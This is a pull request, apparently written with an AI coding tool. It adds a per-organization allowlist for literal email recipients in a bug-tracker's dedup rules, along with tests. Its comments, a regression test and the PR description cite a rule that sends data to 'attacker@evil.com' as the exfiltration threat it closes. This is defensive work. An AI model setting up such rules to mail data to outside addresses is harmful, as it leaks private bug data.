### PR TITLE
fix(rules): per-org allowlist for literal notify.email recipients

### DIFF
--- a/packages/backend/src/api/routes/intelligence-settings.ts
+++ b/packages/backend/src/api/routes/intelligence-settings.ts
@@ -70,6 +70,18 @@ const updateSettingsBody = {
       maximum: 300_000,
     },
     intelligence_self_service_enabled: { type: 'boolean' },
+    // Per-org allowlist for literal `notify.email.to` in dedup rules.
+    // `null` / `[]` = trust-the-admin (legacy behaviour, soft rollout).
+    // Non-empty = strict (only listed addresses are valid targets).
+    // Cap on list size and per-entry length is defensive — the
+    // dispatcher matches case-insensitively after `.trim()`, so the
+    // cap on the column doesn't need to account for casing variants.
+    dedup_email_literal_allowlist: {
+      type: ['array', 'null'],
+      items: { type: 'string', format: 'email', maxLength: 320 },
+      maxItems: 100,
+      uniqueItems: true,
+    },
   },
   additionalProperties: false,
 } as const;
@@ -92,6 +104,7 @@ interface UpdateSettingsBody {
   intelligence_dedup_action?: 'flag' | 'auto_close' | null;
   intelligence_pre_file_dedup_grace_ms?: number | null;
   intelligence_self_service_enabled?: boolean;
+  dedup_email_literal_allowlist?: string[] | null;
 }
 
 // ============================================================================

--- a/packages/backend/src/db/types.ts
+++ b/packages/backend/src/db/types.ts
@@ -721,6 +721,17 @@ export interface OrganizationSettings {
   intelligence_api_key_provisioned_at?: string | null;
   intelligence_api_key_provisioned_by?: string | null;
   intelligence_auto_enrich?: boolean;
+  /**
+   * Per-org allowlist for literal `notify.email.to` values used by
+   * dedup rules. `undefined` / empty = trust-the-admin (legacy
+   * behaviour, all literals pass). Non-empty = strict — only entries
+   * in this list may be sent to. Tokens like `'reporter'` aren't
+   * affected; they have their own auth check (PR #158). Closes the
+   * `notify.email.to = 'attacker@evil.com'` exfiltration vector
+   * once an org configures the list. Emails are lowercased on store
+   * and compared case-insensitively.
+   */
+  dedup_email_literal_allowlist?: string[] | null;
 }
 
 export interface Organization {

--- a/packages/backend/src/services/intelligence/key-provisioning.ts
+++ b/packages/backend/src/services/intelligence/key-provisioning.ts
@@ -59,6 +59,7 @@ export type IntelligenceSettingsUpdate = Pick<
   | 'intelligence_dedup_action'
   | 'intelligence_pre_file_dedup_grace_ms'
   | 'intelligence_self_service_enabled'
+  | 'dedup_email_literal_allowlist'
 >;
 
 // ============================================================================

--- a/packages/backend/src/services/intelligence/key-provisioning.ts
+++ b/packages/backend/src/services/intelligence/key-provisioning.ts
@@ -272,7 +272,20 @@ export class IntelligenceKeyProvisioning {
       }
     }
 
-    const updated = await this.db.organizations.updateSettings(orgId, updates);
+    // Normalize the literal-recipient allowlist on store so the data
+    // settles in one canonical form (trimmed + lowercased + deduped).
+    // The dispatcher already normalizes at compare time (defense in
+    // depth), so this isn't load-bearing for correctness — but it
+    // keeps stored values consistent with the comment on
+    // `OrganizationSettings.dedup_email_literal_allowlist` and avoids
+    // case-variant duplicates accumulating in the JSONB column.
+    const normalized: IntelligenceSettingsUpdate = { ...updates };
+    if (Array.isArray(normalized.dedup_email_literal_allowlist)) {
+      normalized.dedup_email_literal_allowlist = Array.from(
+        new Set(normalized.dedup_email_literal_allowlist.map((e) => e.trim().toLowerCase()))
+      );
+    }
+    const updated = await this.db.organizations.updateSettings(orgId, normalized);
     if (!updated) {
       throw new AppError('Organization not found', 404, 'NotFound');
     }

--- a/packages/backend/src/services/rules/dispatcher.ts
+++ b/packages/backend/src/services/rules/dispatcher.ts
@@ -21,8 +21,12 @@ import type {
 import { pluginSupports } from '../../integrations/capabilities.js';
 import type { ActionSpec } from '../../integrations/dedup-rule.schema.js';
 import { getLogger } from '../../logger.js';
-import type { EmailSender, ReporterVerifier } from './email-sender.js';
-import { resolveEmailRecipient } from './email-sender.js';
+import type {
+  EmailSender,
+  LiteralRecipientAllowlistProvider,
+  ReporterVerifier,
+} from './email-sender.js';
+import { isLiteralRecipient, resolveEmailRecipient } from './email-sender.js';
 import type { RecipientRateLimiter } from './recipient-rate-limiter.js';
 import type { ActionDispatcher, RuleEvalContext } from './types.js';
 
@@ -90,7 +94,15 @@ export class DefaultActionDispatcher implements ActionDispatcher {
      * rules — the per-(rule, canonical) throttle alone doesn't bound
      * this. Tests can omit it; production wiring always passes one.
      */
-    private readonly recipientRateLimiter?: RecipientRateLimiter
+    private readonly recipientRateLimiter?: RecipientRateLimiter,
+    /**
+     * Optional per-org allowlist for literal `notify.email.to`. Only
+     * consulted for literal recipients (tokens like `'reporter'`
+     * bypass — they have their own auth check). Empty / unset list
+     * preserves legacy trust-the-admin behaviour; a configured list
+     * makes the check strict.
+     */
+    private readonly literalRecipientAllowlist?: LiteralRecipientAllowlistProvider
   ) {}
 
   /**
@@ -270,6 +282,43 @@ export class DefaultActionDispatcher implements ActionDispatcher {
           organizationId: context.bugReport.organization_id,
         });
         return false;
+      }
+    }
+    // Literal-recipient allowlist — closes the `notify.email.to =
+    // 'attacker@evil.com'` exfiltration vector for orgs that opt in.
+    // Skipped when `to` is a token (those have their own checks),
+    // when there's no organization (selfhosted), when no provider is
+    // wired (tests), or when the org's allowlist is empty/unset
+    // (legacy trust-the-admin behaviour, soft rollout). Runs before
+    // the rate limiter so a denied literal doesn't burn budget.
+    if (
+      this.literalRecipientAllowlist &&
+      context.bugReport.organization_id !== null &&
+      isLiteralRecipient(to)
+    ) {
+      let allowlist: readonly string[] | null | undefined;
+      try {
+        allowlist = await this.literalRecipientAllowlist(context.bugReport.organization_id);
+      } catch (error) {
+        // Fail closed on provider errors — same shape as the verifier
+        // path. A DB hiccup shouldn't open the exfiltration vector.
+        logger.warn('Skipping notify.email: literal allowlist provider threw', {
+          bugReportId: context.bugReport.id,
+          organizationId: context.bugReport.organization_id,
+          errorType: error instanceof Error ? error.name : 'NonErrorThrown',
+        });
+        return false;
+      }
+      if (allowlist && allowlist.length > 0) {
+        const target = recipient.trim().toLowerCase();
+        const allowed = allowlist.some((entry) => entry.trim().toLowerCase() === target);
+        if (!allowed) {
+          logger.info('Skipping notify.email: literal recipient not on org allowlist', {
+            bugReportId: context.bugReport.id,
+            organizationId: context.bugReport.organization_id,
+          });
+          return false;
+        }
       }
     }
     // Per-recipient throttle — caps fan-out to one address across

--- a/packages/backend/src/services/rules/email-sender.ts
+++ b/packages/backend/src/services/rules/email-sender.ts
@@ -72,6 +72,33 @@ export interface EmailSender {
 export type ReporterVerifier = (organizationId: string, email: string) => Promise<boolean>;
 
 /**
+ * Per-org allowlist for literal `notify.email.to` values. Returns:
+ *   - `null` / `undefined` / `[]` → no allowlist configured; legacy
+ *     trust-the-admin behaviour, all literals pass.
+ *   - non-empty array → strict; only those emails (case-insensitive)
+ *     are valid notification targets for this org's rules.
+ *
+ * Production loads from `organizations.settings.dedup_email_literal_allowlist`.
+ * The provider is consulted only for literal `to` values — tokens
+ * like `'reporter'` have their own auth check and bypass the
+ * allowlist entirely.
+ */
+export type LiteralRecipientAllowlistProvider = (
+  organizationId: string
+) => Promise<readonly string[] | null | undefined>;
+
+/**
+ * Known recipient tokens recognised by the schema. Anything that's
+ * not one of these is a literal email address (validated by the
+ * schema regex on the way in).
+ */
+const RECIPIENT_TOKENS = new Set(['reporter', 'closer', 'all_reporters']);
+
+export function isLiteralRecipient(to: string): boolean {
+  return !RECIPIENT_TOKENS.has(to);
+}
+
+/**
  * Production sender — looks up the project's first active email
  * channel and dispatches via `EmailChannelHandler`. Returns `false`
  * on any expected failure (no channel, unknown template, SMTP

--- a/packages/backend/src/services/rules/wiring.ts
+++ b/packages/backend/src/services/rules/wiring.ts
@@ -124,12 +124,24 @@ export function buildDedupRuleExecutor(
   // across canonicals and rules. Uses the existing notification_throttle
   // table with global defaults (5 emails / 60 minutes per address).
   const recipientRateLimiter = new ThrottleBackedRecipientLimiter(throttle);
+  // Per-org literal-recipient allowlist — closes the
+  // `notify.email.to = 'attacker@evil.com'` exfiltration vector for
+  // orgs that configure it. Empty / unset list preserves the legacy
+  // trust-the-admin behaviour, so this is a soft rollout: orgs opt in
+  // by populating `organizations.settings.dedup_email_literal_allowlist`.
+  const literalRecipientAllowlist = async (
+    orgId: string
+  ): Promise<readonly string[] | null | undefined> => {
+    const org = await db.organizations.findById(orgId);
+    return org?.settings?.dedup_email_literal_allowlist ?? null;
+  };
   const dispatcher = new DefaultActionDispatcher(
     resolver,
     lookup,
     emailSender,
     verifyReporter,
-    recipientRateLimiter
+    recipientRateLimiter,
+    literalRecipientAllowlist
   );
   const rateLimiter = new ThrottleBackedRateLimiter(throttle);
   const contextProvider = new DatabaseRuleContextProvider(db);

--- a/packages/backend/tests/services/intelligence/key-provisioning.test.ts
+++ b/packages/backend/tests/services/intelligence/key-provisioning.test.ts
@@ -402,5 +402,47 @@ describe('IntelligenceKeyProvisioning', () => {
       });
       expect(mockFactory.invalidateOrg).not.toHaveBeenCalled();
     });
+
+    it('normalizes dedup_email_literal_allowlist on store (trim, lowercase, dedupe)', async () => {
+      await provisioning.updateSettings('org-1', {
+        dedup_email_literal_allowlist: [
+          '  Alice@Example.COM ',
+          'bob@example.com',
+          'BOB@example.com', // case-variant duplicate of bob
+          'carol@example.com',
+        ],
+      });
+
+      const arg = (mockDb.organizations!.updateSettings as ReturnType<typeof vi.fn>).mock
+        .calls[0][1];
+      // Settles in one canonical form before persistence — matches the
+      // docstring on `OrganizationSettings.dedup_email_literal_allowlist`
+      // and the runtime normalization in the dispatcher.
+      expect(arg.dedup_email_literal_allowlist).toEqual([
+        'alice@example.com',
+        'bob@example.com',
+        'carol@example.com',
+      ]);
+    });
+
+    it('passes through an empty allowlist untouched', async () => {
+      await provisioning.updateSettings('org-1', {
+        dedup_email_literal_allowlist: [],
+      });
+
+      const arg = (mockDb.organizations!.updateSettings as ReturnType<typeof vi.fn>).mock
+        .calls[0][1];
+      expect(arg.dedup_email_literal_allowlist).toEqual([]);
+    });
+
+    it('passes through a null allowlist (clears the setting)', async () => {
+      await provisioning.updateSettings('org-1', {
+        dedup_email_literal_allowlist: null,
+      });
+
+      const arg = (mockDb.organizations!.updateSettings as ReturnType<typeof vi.fn>).mock
+        .calls[0][1];
+      expect(arg.dedup_email_literal_allowlist).toBeNull();
+    });
   });
 });

--- a/packages/backend/tests/services/rules/dispatcher.test.ts
+++ b/packages/backend/tests/services/rules/dispatcher.test.ts
@@ -489,6 +489,167 @@ describe('DefaultActionDispatcher', () => {
     });
   });
 
+  describe('notify.email — literal-recipient allowlist (per-org)', () => {
+    function buildAllowlistDispatcher(provider: Mock) {
+      const send: Mock = vi.fn().mockResolvedValue(true);
+      const emailSender = { send };
+      const d = new DefaultActionDispatcher(
+        resolver as unknown as CanonicalTicketResolver,
+        lookup as CapabilityServiceLookup,
+        emailSender,
+        undefined,
+        undefined,
+        provider as unknown as (
+          organizationId: string
+        ) => Promise<readonly string[] | null | undefined>
+      );
+      return { dispatcher: d, send };
+    }
+
+    // Regression scaffold: an admin (or a compromised admin path)
+    // writes a rule with `notify.email.to = 'attacker@evil.com'`.
+    // Without an allowlist this used to ship bug data straight out;
+    // with a configured allowlist the literal is rejected before
+    // `emailSender.send` is ever called.
+    it('skips literal recipients not in the org allowlist', async () => {
+      const provider = vi.fn().mockResolvedValue(['ops@bugspotter.io']);
+      const { dispatcher: d, send } = buildAllowlistDispatcher(provider);
+      const ctx = makeContext({ bugReport: makeBug({ organization_id: 'org-1' }) });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'attacker@evil.com',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(false);
+      expect(provider).toHaveBeenCalledWith('org-1');
+      expect(send).not.toHaveBeenCalled();
+    });
+
+    it('sends when the literal recipient matches an entry on the allowlist', async () => {
+      const provider = vi.fn().mockResolvedValue(['ops@bugspotter.io']);
+      const { dispatcher: d, send } = buildAllowlistDispatcher(provider);
+      const ctx = makeContext({ bugReport: makeBug({ organization_id: 'org-1' }) });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'ops@bugspotter.io',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(true);
+      expect(send).toHaveBeenCalledTimes(1);
+    });
+
+    it('matches the allowlist case-insensitively (and tolerates surrounding whitespace)', async () => {
+      const provider = vi.fn().mockResolvedValue([' Ops@BugSpotter.io ']);
+      const { dispatcher: d, send } = buildAllowlistDispatcher(provider);
+      const ctx = makeContext({ bugReport: makeBug({ organization_id: 'org-1' }) });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'ops@bugspotter.io',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(true);
+      expect(send).toHaveBeenCalledTimes(1);
+    });
+
+    it('preserves legacy behaviour when the allowlist is empty or unset', async () => {
+      const provider = vi.fn().mockResolvedValue([]);
+      const { dispatcher: d, send } = buildAllowlistDispatcher(provider);
+      const ctx = makeContext({ bugReport: makeBug({ organization_id: 'org-1' }) });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'ops@bugspotter.io',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(true);
+      expect(send).toHaveBeenCalledTimes(1);
+
+      // null also counts as "no allowlist configured" — legacy soft path.
+      provider.mockResolvedValueOnce(null);
+      send.mockClear();
+      const ok2 = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'anywhere@example.com',
+        template: 'dedup_ack',
+      });
+      expect(ok2).toBe(true);
+      expect(send).toHaveBeenCalledTimes(1);
+    });
+
+    it('does not consult the allowlist for the `reporter` token', async () => {
+      const provider = vi.fn().mockResolvedValue(['only-this@example.com']);
+      const send: Mock = vi.fn().mockResolvedValue(true);
+      const emailSender = { send };
+      // Wire the reporter verifier too so the reporter path doesn't
+      // fail-closed on the missing verifier in SaaS mode.
+      const verify = vi.fn().mockResolvedValue(true);
+      const d = new DefaultActionDispatcher(
+        resolver as unknown as CanonicalTicketResolver,
+        lookup as CapabilityServiceLookup,
+        emailSender,
+        verify as unknown as (orgId: string, email: string) => Promise<boolean>,
+        undefined,
+        provider as unknown as (
+          organizationId: string
+        ) => Promise<readonly string[] | null | undefined>
+      );
+      const ctx = makeContext({
+        bugReport: makeBug({
+          organization_id: 'org-1',
+          metadata: { metadata: { user: { email: 'alice@example.com' } } },
+        }),
+      });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'reporter',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(true);
+      expect(provider).not.toHaveBeenCalled();
+      expect(send).toHaveBeenCalledTimes(1);
+    });
+
+    it('skips the allowlist entirely on the selfhosted path (organization_id is null)', async () => {
+      const provider = vi.fn().mockResolvedValue(['only-this@example.com']);
+      const { dispatcher: d, send } = buildAllowlistDispatcher(provider);
+      const ctx = makeContext({ bugReport: makeBug({ organization_id: null }) });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'anywhere@example.com',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(true);
+      expect(provider).not.toHaveBeenCalled();
+      expect(send).toHaveBeenCalledTimes(1);
+    });
+
+    it('fails closed when the provider throws', async () => {
+      const provider = vi.fn().mockRejectedValue(new Error('db gone'));
+      const { dispatcher: d, send } = buildAllowlistDispatcher(provider);
+      const ctx = makeContext({ bugReport: makeBug({ organization_id: 'org-1' }) });
+
+      const ok = await d.dispatch(ctx, {
+        type: 'notify.email',
+        to: 'ops@bugspotter.io',
+        template: 'dedup_ack',
+      });
+
+      expect(ok).toBe(false);
+      expect(send).not.toHaveBeenCalled();
+    });
+  });
+
   describe('notify.email — per-recipient rate limiter', () => {
     function buildLimitedDispatcher(limiter: Mock, verifyReporter?: Mock) {
       const send: Mock = vi.fn().mockResolvedValue(true);


### PR DESCRIPTION
## Summary

C2 carry-over #3 from Phase 0.5. The \`notify.email.to = literal\` branch was trust-the-admin: a malicious or compromised admin (or a misconfigured rule) could ship bug data straight to any address by writing \`notify.email.to = 'attacker@evil.com'\`. PR #158 closed the \`'reporter'\` branch with an auth check; PR #163 added a global per-recipient cap. This PR closes the literal branch.

## What lands

- New \`dedup_email_literal_allowlist\` field on \`OrganizationSettings\` (\`string[] | null\`). **Empty / unset = legacy trust-the-admin (soft rollout — all literals pass).** Non-empty = strict: only those emails (case-insensitive, whitespace-tolerant) are valid literal notification targets for the org's rules.
- New \`LiteralRecipientAllowlistProvider\` type + \`isLiteralRecipient\` helper.
- \`DefaultActionDispatcher\` accepts an optional provider and consults it on \`notify.email\` for **literal** recipients, **after reporter verification, before the per-recipient rate limiter**. Token recipients (\`'reporter'\` etc.) bypass — they have their own auth check. Selfhosted (\`organization_id === null\`) bypasses too. Fails closed on provider errors.
- Wiring reads the org's settings via \`db.organizations.findById\`.

## Out of scope

- Admin UI for managing the allowlist (separate PR).
- Confirmation-flow variant (verify-by-email + token).
- Auto-bootstrap from existing rule recipients at migration time.

## Tests

7 new dispatcher tests:
- **Regression scaffold**: literal not on list → skip; \`emailSender.send\` never called.
- Literal on list → pass.
- Case-insensitive + whitespace-tolerant match.
- Empty/null allowlist preserves legacy behaviour.
- \`'reporter'\` token bypasses the check.
- Selfhosted (\`organization_id\` null) bypasses.
- Provider throws → fail closed.

## Test plan

- [x] Backend src typecheck clean
- [x] Backend unit 2801 / 0 failures (JUnit) — +7 new tests
- [x] No admin changes

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Organizations can configure an optional per-organization email allowlist to control which literal email addresses receive notifications from rules. Addresses not on the allowlist are excluded. Matching is case-insensitive and ignores surrounding whitespace. Self-hosted/legacy behavior remains unchanged when unset.
* **Tests**
  * Added tests validating allowlist matching, case/whitespace tolerance, fallback behavior, and error handling.
* **Chores**
  * Settings API updated to accept and validate the allowlist.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/apex-bridge/bugspotter/pull/164?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->